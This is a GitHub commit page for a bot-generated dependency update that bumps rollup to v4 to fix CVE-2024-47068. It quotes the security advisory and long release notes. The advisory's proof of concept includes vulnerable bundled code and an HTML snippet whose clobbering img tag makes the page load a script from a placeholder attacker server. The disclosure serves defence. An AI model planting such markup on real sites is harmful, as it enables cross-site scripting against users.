Skip to content

Commit

Permalink
chore(deps): [security] update dependency rollup to v4, fix CVE-2024-…
Browse files Browse the repository at this point in the history
…47068 (#1023)

This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [rollup](https://rollupjs.org/)
([source](https://redirect.github.com/rollup/rollup)) | [`^3.29.4` ->
`^4.0.0`](https://renovatebot.com/diffs/npm/rollup/3.29.4/4.22.4) |
[![age](https://developer.mend.io/api/mc/badges/age/npm/rollup/4.22.4?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![adoption](https://developer.mend.io/api/mc/badges/adoption/npm/rollup/4.22.4?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![passing](https://developer.mend.io/api/mc/badges/compatibility/npm/rollup/3.29.4/4.22.4?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/rollup/3.29.4/4.22.4?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|

### GitHub Vulnerability Alerts

####
[CVE-2024-47068](https://redirect.github.com/rollup/rollup/security/advisories/GHSA-gcx4-mw62-g8wm)

### Summary

We discovered a DOM Clobbering vulnerability in rollup when bundling
scripts that use `import.meta.url` or with plugins that emit and
reference asset files from code in `cjs`/`umd`/`iife` format. The DOM
Clobbering gadget can lead to cross-site scripting (XSS) in web pages
where scriptless attacker-controlled HTML elements (e.g., an `img` tag
with an unsanitized `name` attribute) are present.

It's worth noting that we’ve identifed similar issues in other popular
bundlers like Webpack
([CVE-2024-43788](https://redirect.github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986)),
which might serve as a good reference.

### Details

#### Backgrounds

DOM Clobbering is a type of code-reuse attack where the attacker first
embeds a piece of non-script, seemingly benign HTML markups in the
webpage (e.g. through a post or comment) and leverages the gadgets
(pieces of js code) living in the existing javascript code to transform
it into executable code. More for information about DOM Clobbering, here
are some references:

[1] https://scnps.co/papers/sp23_domclob.pdf
[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/

#### Gadget found in `rollup`

We have identified a DOM Clobbering vulnerability in `rollup` bundled
scripts, particularly when the scripts uses `import.meta` and set output
in format of `cjs`/`umd`/`iife`. In such cases, `rollup` replaces meta
property with the URL retrieved from `document.currentScript`.


https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162


https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185

However, this implementation is vulnerable to a DOM Clobbering attack.
The `document.currentScript` lookup can be shadowed by an attacker via
the browser's named DOM tree element access mechanism. This manipulation
allows an attacker to replace the intended script element with a
malicious HTML element. When this happens, the `src` attribute of the
attacker-controlled element (e.g., an `img` tag ) is used as the URL for
importing scripts, potentially leading to the dynamic loading of scripts
from an attacker-controlled server.

### PoC

Considering a website that contains the following `main.js` script, the
devloper decides to use the `rollup` to bundle up the program: `rollup
main.js --format cjs --file bundle.js`.

```
var s = document.createElement('script')
s.src = import.meta.url + 'extra.js'
document.head.append(s)
```

The output `bundle.js` is shown in the following code snippet.

```
'use strict';

var _documentCurrentScript = typeof document !== 'undefined' ? document.currentScript : null;
var s = document.createElement('script');
s.src = (typeof document === 'undefined' ? require('u' + 'rl').pathToFileURL(__filename).href : (_documentCurrentScript && False && _documentCurrentScript.src || new URL('bundle.js', document.baseURI).href)) + 'extra.js';
document.head.append(s);
```

Adding the `rollup` bundled script, `bundle.js`, as part of the web page
source code, the page could load the `extra.js` file from the attacker's
domain, `attacker.controlled.server` due to the introduced gadget during
bundling. The attacker only needs to insert an `img` tag with the name
attribute set to `currentScript`. This can be done through a website's
feature that allows users to embed certain script-less HTML (e.g.,
markdown renderers, web email clients, forums) or via an HTML injection
vulnerability in third-party JavaScript loaded on the page.

```
<!DOCTYPE html>
<html>
<head>
  <title>rollup Example</title>
  <!-- Attacker-controlled Script-less HTML Element starts--!>
  <img name="currentScript" src="https://attacker.controlled.server/"></img>
  <!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script type="module" crossorigin src="bundle.js"></script>
<body>
</body>
</html>
```

### Impact

This vulnerability can result in cross-site scripting (XSS) attacks on
websites that include rollup-bundled files (configured with an output
format of `cjs`, `iife`, or `umd` and use `import.meta`) and allow users
to inject certain scriptless HTML tags without properly sanitizing the
`name` or `id` attributes.

### Patch

Patching the following two functions with type checking would be
effective mitigations against DOM Clobbering attack.

```
const getRelativeUrlFromDocument = (relativePath: string, umd = false) =>
	getResolveUrl(
		`'${escapeId(relativePath)}', ${
			umd ? `typeof document === 'undefined' ? location.href : ` : ''
		}document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`
	);
```

```
const getUrlFromDocument = (chunkId: string, umd = false) =>
	`${
		umd ? `typeof document === 'undefined' ? location.href : ` : ''
	}(${DOCUMENT_CURRENT_SCRIPT} && ${DOCUMENT_CURRENT_SCRIPT}.tagName.toUpperCase() === 'SCRIPT' &&${DOCUMENT_CURRENT_SCRIPT}.src || new URL('${escapeId(
		chunkId
	)}', document.baseURI).href)`;
```

---

### Release Notes

<details>
<summary>rollup/rollup (rollup)</summary>

###
[`v4.22.4`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4224)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.22.3...v4.22.4)

*2024-09-21*

##### Bug Fixes

- Fix a vulnerability in generated code that affects IIFE, UMD and CJS
bundles when run in a browser context
([#&#8203;5671](https://redirect.github.com/rollup/rollup/issues/5671))

##### Pull Requests

- [#&#8203;5670](https://redirect.github.com/rollup/rollup/pull/5670):
refactor: Use object.prototype to check for reserved properties
([@&#8203;YuHyeonWook](https://redirect.github.com/YuHyeonWook))
- [#&#8203;5671](https://redirect.github.com/rollup/rollup/pull/5671):
Fix DOM Clobbering CVE
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))

###
[`v4.22.3`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4223)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.22.2...v4.22.3)

*2024-09-21*

##### Bug Fixes

- Ensure that mutations in modules without side effects are observed
while properly handling transitive dependencies
([#&#8203;5669](https://redirect.github.com/rollup/rollup/issues/5669))

##### Pull Requests

- [#&#8203;5669](https://redirect.github.com/rollup/rollup/pull/5669):
Ensure impure dependencies of pure modules are added
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))

###
[`v4.22.2`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4222)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.22.1...v4.22.2)

*2024-09-20*

##### Bug Fixes

- Revert fix for side effect free modules until other issues are
investigated
([#&#8203;5667](https://redirect.github.com/rollup/rollup/issues/5667))

##### Pull Requests

- [#&#8203;5667](https://redirect.github.com/rollup/rollup/pull/5667):
Partially revert
[#&#8203;5658](https://redirect.github.com/rollup/rollup/issues/5658)
and re-apply
[#&#8203;5644](https://redirect.github.com/rollup/rollup/issues/5644)
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))

###
[`v4.22.1`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4221)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.22.0...v4.22.1)

*2024-09-20*

##### Bug Fixes

- Revert
[#&#8203;5644](https://redirect.github.com/rollup/rollup/issues/5644)
"stable chunk hashes" while issues are being investigated

##### Pull Requests

- [#&#8203;5663](https://redirect.github.com/rollup/rollup/pull/5663):
chore(deps): update dependency inquirer to v11
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot],
[@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5664](https://redirect.github.com/rollup/rollup/pull/5664):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5665](https://redirect.github.com/rollup/rollup/pull/5665):
fix: type in CI file
([@&#8203;YuHyeonWook](https://redirect.github.com/YuHyeonWook))
- [#&#8203;5666](https://redirect.github.com/rollup/rollup/pull/5666):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])

###
[`v4.22.0`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4220)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.21.3...v4.22.0)

*2024-09-19*

##### Features

- Add additional known global values to avoid access side effects
([#&#8203;5651](https://redirect.github.com/rollup/rollup/issues/5651))

##### Bug Fixes

- Ensure deterministic chunk hash generation despite async renderChunk
hook
([#&#8203;5644](https://redirect.github.com/rollup/rollup/issues/5644))
- Improve side effect detection when using "smallest" treeshaking preset
when imports are optimized away
([#&#8203;5658](https://redirect.github.com/rollup/rollup/issues/5658))

##### Pull Requests

- [#&#8203;5644](https://redirect.github.com/rollup/rollup/pull/5644):
fix: apply final hashes deterministically with stable placeholders set
([@&#8203;mattkubej](https://redirect.github.com/mattkubej),
[@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5646](https://redirect.github.com/rollup/rollup/pull/5646):
chore(deps): update dependency
[@&#8203;mermaid-js/mermaid-cli](https://redirect.github.com/mermaid-js/mermaid-cli)
to v11 ([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5647](https://redirect.github.com/rollup/rollup/pull/5647):
chore(deps): update dependency concurrently to v9
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5648](https://redirect.github.com/rollup/rollup/pull/5648):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5651](https://redirect.github.com/rollup/rollup/pull/5651):
feat: add `AggregateError`, `FinalizationRegistry`, `WeakRef` to
knownGlobals ([@&#8203;re-taro](https://redirect.github.com/re-taro))
- [#&#8203;5653](https://redirect.github.com/rollup/rollup/pull/5653):
Fix example selection in REPL
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5657](https://redirect.github.com/rollup/rollup/pull/5657):
chore(deps): update dependency vite to v5.4.6 \[security]
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5658](https://redirect.github.com/rollup/rollup/pull/5658):
Detect variable reassignments in modules without side effects
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))

###
[`v4.21.3`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4213)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.21.2...v4.21.3)

*2024-09-12*

##### Bug Fixes

- Always respect side effects in left-hand side of optional chain
([#&#8203;5642](https://redirect.github.com/rollup/rollup/issues/5642))
- Update stack trace for augmented errors to not hide relevant
information
([#&#8203;5640](https://redirect.github.com/rollup/rollup/issues/5640))

##### Pull Requests

- [#&#8203;5636](https://redirect.github.com/rollup/rollup/pull/5636):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5637](https://redirect.github.com/rollup/rollup/pull/5637):
chore(deps): lock file maintenance
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5640](https://redirect.github.com/rollup/rollup/pull/5640):
fix: keep the message of stack up-to-date
([@&#8203;TrickyPi](https://redirect.github.com/TrickyPi))
- [#&#8203;5642](https://redirect.github.com/rollup/rollup/pull/5642):
fix: include left-side effect of optional chaining in the end of
hasEffectsAsChainElement
([@&#8203;TrickyPi](https://redirect.github.com/TrickyPi))

###
[`v4.21.2`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4212)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.21.1...v4.21.2)

*2024-08-30*

##### Bug Fixes

- Handle IIFE/UMD namespace definitions conflicting with a builtin
property
([#&#8203;5605](https://redirect.github.com/rollup/rollup/issues/5605))

##### Pull Requests

- [#&#8203;5605](https://redirect.github.com/rollup/rollup/pull/5605):
fix: Wrong namespace property definition
([@&#8203;thirumurugan-git](https://redirect.github.com/thirumurugan-git),
[@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5630](https://redirect.github.com/rollup/rollup/pull/5630):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5631](https://redirect.github.com/rollup/rollup/pull/5631):
chore(deps): lock file maintenance
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5632](https://redirect.github.com/rollup/rollup/pull/5632):
chore(deps): lock file maintenance
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])

###
[`v4.21.1`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4211)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.21.0...v4.21.1)

*2024-08-26*

##### Bug Fixes

- Ensure `closeWatcher` hook is called when watch mode is aborted via
Ctrl+C
([#&#8203;5618](https://redirect.github.com/rollup/rollup/issues/5618))
- Do not produce invalid code for `import.meta.url` in compact mode
([#&#8203;5624](https://redirect.github.com/rollup/rollup/issues/5624))
- Do not throw when generating chunk names when preserving modules in
Windows
([#&#8203;5625](https://redirect.github.com/rollup/rollup/issues/5625))

##### Pull Requests

- [#&#8203;5591](https://redirect.github.com/rollup/rollup/pull/5591):
chore(deps): update dependency
[@&#8203;types/eslint](https://redirect.github.com/types/eslint) to v9
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot],
[@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5618](https://redirect.github.com/rollup/rollup/pull/5618):
preload the WASM file even though the version is undefined.
([@&#8203;TrickyPi](https://redirect.github.com/TrickyPi))
- [#&#8203;5619](https://redirect.github.com/rollup/rollup/pull/5619):
Call and await closeWatcher hooks on exit signals
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5622](https://redirect.github.com/rollup/rollup/pull/5622):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot],
[@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5624](https://redirect.github.com/rollup/rollup/pull/5624):
fix: add space for DOCUMENT_CURRENT_SCRIPT template
([@&#8203;TrickyPi](https://redirect.github.com/TrickyPi))
- [#&#8203;5625](https://redirect.github.com/rollup/rollup/pull/5625):
fix: get the right chunk name for preserve modules in Windows
([@&#8203;TrickyPi](https://redirect.github.com/TrickyPi),
[@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))

###
[`v4.21.0`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4210)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.20.0...v4.21.0)

*2024-08-18*

##### Features

- Add option to configure directory for virtual modules when preserving
modules
([#&#8203;5602](https://redirect.github.com/rollup/rollup/issues/5602))

##### Pull Requests

- [#&#8203;5602](https://redirect.github.com/rollup/rollup/pull/5602):
feat: introduce the virtualDirname option to customize the virtual
directory name
([@&#8203;TrickyPi](https://redirect.github.com/TrickyPi))
- [#&#8203;5607](https://redirect.github.com/rollup/rollup/pull/5607):
chore(deps): update typescript-eslint monorepo to v8 (major)
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot],
[@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5608](https://redirect.github.com/rollup/rollup/pull/5608):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5611](https://redirect.github.com/rollup/rollup/pull/5611):
chore: fix the `noConflict` option in REPL.
([@&#8203;7086cmd](https://redirect.github.com/7086cmd))
- [#&#8203;5613](https://redirect.github.com/rollup/rollup/pull/5613):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5614](https://redirect.github.com/rollup/rollup/pull/5614):
chore(deps): lock file maintenance
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])

###
[`v4.20.0`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4200)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.19.2...v4.20.0)

*2024-08-03*

##### Features

- Allow plugins to specify the original file name when emitting assets
([#&#8203;5596](https://redirect.github.com/rollup/rollup/issues/5596))

##### Pull Requests

- [#&#8203;5596](https://redirect.github.com/rollup/rollup/pull/5596):
Add originalFIleName property to emitted assets
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5599](https://redirect.github.com/rollup/rollup/pull/5599):
chore(deps): update dependency eslint-plugin-unicorn to v55
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot],
[@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5600](https://redirect.github.com/rollup/rollup/pull/5600):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot],
[@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))

###
[`v4.19.2`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4192)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.19.1...v4.19.2)

*2024-08-01*

##### Bug Fixes

- Avoid "cannot get value of null" error when using optional chaining
with namespaces
([#&#8203;5597](https://redirect.github.com/rollup/rollup/issues/5597))

##### Pull Requests

- [#&#8203;5597](https://redirect.github.com/rollup/rollup/pull/5597):
Fix retrieval of literal values for chained namespaces
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))

###
[`v4.19.1`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4191)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.19.0...v4.19.1)

*2024-07-27*

##### Bug Fixes

- Do not remove parantheses when tree-shaking logical expressions
([#&#8203;5584](https://redirect.github.com/rollup/rollup/issues/5584))
- Do not ignore side effects in calls left of an optional chaining
operator
([#&#8203;5589](https://redirect.github.com/rollup/rollup/issues/5589))

##### Pull Requests

- [#&#8203;5584](https://redirect.github.com/rollup/rollup/pull/5584):
fix: find whitespace from operator position to start
([@&#8203;TrickyPi](https://redirect.github.com/TrickyPi))
- [#&#8203;5587](https://redirect.github.com/rollup/rollup/pull/5587):
docs: improve command by code-group
([@&#8203;thinkasany](https://redirect.github.com/thinkasany),
[@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5589](https://redirect.github.com/rollup/rollup/pull/5589):
Fix side effect detection in optional chains
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5592](https://redirect.github.com/rollup/rollup/pull/5592):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5593](https://redirect.github.com/rollup/rollup/pull/5593):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5594](https://redirect.github.com/rollup/rollup/pull/5594):
chore(deps): lock file maintenance
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5595](https://redirect.github.com/rollup/rollup/pull/5595):
chore(deps): lock file maintenance
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])

###
[`v4.19.0`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4190)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.18.1...v4.19.0)

*2024-07-20*

##### Features

- Implement support for decorators
([#&#8203;5562](https://redirect.github.com/rollup/rollup/issues/5562))

##### Bug Fixes

- Improve soucemap generation when tree-shaking logical expressions
([#&#8203;5581](https://redirect.github.com/rollup/rollup/issues/5581))

##### Pull Requests

- [#&#8203;5562](https://redirect.github.com/rollup/rollup/pull/5562):
feat: implementing decorator support
([@&#8203;TrickyPi](https://redirect.github.com/TrickyPi),
[@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5570](https://redirect.github.com/rollup/rollup/pull/5570):
refactor(finalisers): condition branch
([@&#8203;Simon-He95](https://redirect.github.com/Simon-He95),
[@&#8203;zhangmo8](https://redirect.github.com/zhangmo8))
- [#&#8203;5572](https://redirect.github.com/rollup/rollup/pull/5572):
Improve chunk and asset type information in docs
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5573](https://redirect.github.com/rollup/rollup/pull/5573):
Switch to audit resolver to ignore requirejs vulnerability
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5575](https://redirect.github.com/rollup/rollup/pull/5575):
chore(deps): update dependency inquirer to v10
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot],
[@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5576](https://redirect.github.com/rollup/rollup/pull/5576):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot],
[@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5580](https://redirect.github.com/rollup/rollup/pull/5580):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot],
[@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5581](https://redirect.github.com/rollup/rollup/pull/5581):
When tree-shaking logical expression, make sure to remove all trailing
white-space.
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))

###
[`v4.18.1`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4181)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.18.0...v4.18.1)

*2024-07-08*

##### Bug Fixes

- Prevent "%" in generated file names to ensure imports resolve
([#&#8203;5535](https://redirect.github.com/rollup/rollup/issues/5535))

##### Pull Requests

- [#&#8203;5524](https://redirect.github.com/rollup/rollup/pull/5524):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5525](https://redirect.github.com/rollup/rollup/pull/5525):
chore(deps): lock file maintenance
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5526](https://redirect.github.com/rollup/rollup/pull/5526):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5527](https://redirect.github.com/rollup/rollup/pull/5527):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5529](https://redirect.github.com/rollup/rollup/pull/5529):
Use Spanned trait to simplify logic
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5530](https://redirect.github.com/rollup/rollup/pull/5530):
Fix typos in ARCHITECTURE.md
([@&#8203;younggglcy](https://redirect.github.com/younggglcy))
- [#&#8203;5532](https://redirect.github.com/rollup/rollup/pull/5532):
Use Rust macros for converters where possible
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5535](https://redirect.github.com/rollup/rollup/pull/5535):
fix: escape `%` if URI malformed
([@&#8203;baseballyama](https://redirect.github.com/baseballyama),
[@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5536](https://redirect.github.com/rollup/rollup/pull/5536):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot],
[@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5541](https://redirect.github.com/rollup/rollup/pull/5541):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5542](https://redirect.github.com/rollup/rollup/pull/5542):
chore(deps): lock file maintenance
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5543](https://redirect.github.com/rollup/rollup/pull/5543):
Watch rust files and rebuild during dev
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5544](https://redirect.github.com/rollup/rollup/pull/5544):
Refactor AST converters
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5545](https://redirect.github.com/rollup/rollup/pull/5545):
chore(deps): update dependency
[@&#8203;rollup/plugin-commonjs](https://redirect.github.com/rollup/plugin-commonjs)
to v26 ([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5546](https://redirect.github.com/rollup/rollup/pull/5546):
chore(deps): update dependency nyc to v17
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5547](https://redirect.github.com/rollup/rollup/pull/5547):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5548](https://redirect.github.com/rollup/rollup/pull/5548):
chore(deps): lock file maintenance
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5549](https://redirect.github.com/rollup/rollup/pull/5549):
chore(deps): lock file maintenance
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5550](https://redirect.github.com/rollup/rollup/pull/5550):
chore(deps): update dependency eslint-plugin-unicorn to v54
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot],
[@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5551](https://redirect.github.com/rollup/rollup/pull/5551):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot],
[@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5555](https://redirect.github.com/rollup/rollup/pull/5555):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5556](https://redirect.github.com/rollup/rollup/pull/5556):
chore(deps): lock file maintenance
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5558](https://redirect.github.com/rollup/rollup/pull/5558):
Consider that the body of ClassBody might be of type StaticBlock
([@&#8203;TrickyPi](https://redirect.github.com/TrickyPi))
- [#&#8203;5565](https://redirect.github.com/rollup/rollup/pull/5565):
refactor(ast): conditional branch
([@&#8203;Simon-He95](https://redirect.github.com/Simon-He95))
- [#&#8203;5566](https://redirect.github.com/rollup/rollup/pull/5566):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5567](https://redirect.github.com/rollup/rollup/pull/5567):
chore(deps): lock file maintenance
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])

###
[`v4.18.0`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4180)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.17.2...v4.18.0)

*2024-05-22*

##### Features

- Resolve import.meta.filename and .dirname in transpiled plugins
([#&#8203;5520](https://redirect.github.com/rollup/rollup/issues/5520))

##### Pull Requests

- [#&#8203;5504](https://redirect.github.com/rollup/rollup/pull/5504):
Auto generate node index
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5507](https://redirect.github.com/rollup/rollup/pull/5507):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5508](https://redirect.github.com/rollup/rollup/pull/5508):
chore(deps): lock file maintenance
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5510](https://redirect.github.com/rollup/rollup/pull/5510):
Split up converter.rs into AST nodes
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5512](https://redirect.github.com/rollup/rollup/pull/5512):
chore(deps): update dependency builtin-modules to v4
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot],
[@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5514](https://redirect.github.com/rollup/rollup/pull/5514):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot])
- [#&#8203;5518](https://redirect.github.com/rollup/rollup/pull/5518):
chore(deps): update dependency eslint-plugin-unicorn to v53
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot],
[@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5519](https://redirect.github.com/rollup/rollup/pull/5519):
chore(deps): lock file maintenance minor/patch updates
([@&#8203;renovate](https://redirect.github.com/renovate)\[bot],
[@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5520](https://redirect.github.com/rollup/rollup/pull/5520):
Resolve import.meta.{filename,dirname} in files imported from config
([@&#8203;BPScott](https://redirect.github.com/BPScott))
- [#&#8203;5521](https://redirect.github.com/rollup/rollup/pull/5521):
docs: correct base32 to base36 in documentation
([@&#8203;highcastlee](https://redirect.github.com/highcastlee))

###
[`v4.17.2`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4172)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v4.17.1...v4.17.2)

*2024-04-30*

##### Bug Fixes

- Fix tree-shaking problems when using spread arguments
([#&#8203;5503](https://redirect.github.com/rollup/rollup/issues/5503))

##### Pull Requests

- [#&#8203;5501](https://redirect.github.com/rollup/rollup/pull/5501):
Slightly improve perf report
([@&#8203;lukastaegert](https://redirect.github.com/lukastaegert))
- [#&#8203;5503](https://redirect.github.com/rollup/rollup/pull/5503):
fix: rest element should deoptimize parameter values
([@&#8203;liuly0322](https://redirect.github.com/liuly0322))

###
[`v4.17.1`](https://redirect.github.com/rollup/rollup/blob/HEAD/CHANGELOG.md#4171)

[Compare
